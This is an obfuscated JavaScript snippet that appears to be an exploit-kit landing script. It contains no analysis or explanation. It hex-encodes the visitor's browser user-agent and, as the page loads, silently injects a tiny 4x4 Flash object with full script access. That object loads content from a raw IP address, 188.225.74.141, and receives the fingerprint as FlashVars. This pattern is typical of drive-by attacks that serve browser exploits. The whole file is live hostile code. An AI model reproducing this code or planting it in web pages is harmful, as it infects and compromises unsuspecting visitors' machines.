/*s65861d66277hssfj61771fs*/function hgfgerdfgdf(num, width){/*s88749d30759hfj90688fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s64437d72813hfj4741fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s24045d10338hfj53462fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s28995d27795hfj11303fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd92941hfs*/c += b + d;/*s50334d21033hfj91849fs*/e += 1;}return c;}/*s82351dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.74.141/?OTY2NzA5MTM=&mail=gyo9cUFgU8aiqjUPTzBSagZXXrhSLNAhFqZOdQLNu2FynmrBBJskhxRSC7GNYnustWlsY4Agam6_7VaCO-w&help=work&paper=xH_QMrPYbR3FFYDfKPrEUKdEMU3WA0SKwYyZhazVF5yxFDTGpbH1FxzspVydCFyEmvFvdLAHIwGh1UTASwd&inform=Mzc2NDk3NjA=&slam=MTE2ODEwMzA=", ghnvbn("http://188.225.74.141/?Njg5ODg4MTM=&help=gift&inform=MzI2ODAyNDM=&paper=xXzQMvWdbRXQC53EKvncT6NHMVHRHECL2Y-dmrHTefjaeVWkzrHFTF_yozKASASG6_FtdfJRDQ&mail=K3j0SCfARnmI1cVF8V9qj73UDTnBae1p_W_0CNMwsQqsSXErM72lj9nbAkcs8mxBKC6FENjOse&gift=MjY5OTc0NDE=","wexykukusw"));